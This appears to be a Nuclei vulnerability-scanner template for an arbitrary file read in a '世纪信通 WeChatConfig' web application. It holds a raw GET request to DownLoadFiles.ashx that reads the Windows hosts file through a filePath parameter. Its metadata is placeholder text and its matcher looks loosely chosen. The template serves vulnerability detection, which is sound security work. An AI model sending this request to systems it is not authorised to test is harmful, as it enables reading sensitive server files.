id: sjxt-WeChatConfig-fileread
info:
  name: Template Name
  author: apple
  severity: high
  description: 世纪信通-WeChatConfig-任意文件读取漏洞
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |-
        GET /WeChatConfig/ashx/DownLoadFiles.ashx?filePath=C:/Windows/System32/drivers/etc/hosts HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Content-Length: 4
    matchers:
      - type: word
        part: body
        words:
          - 'Copyright'
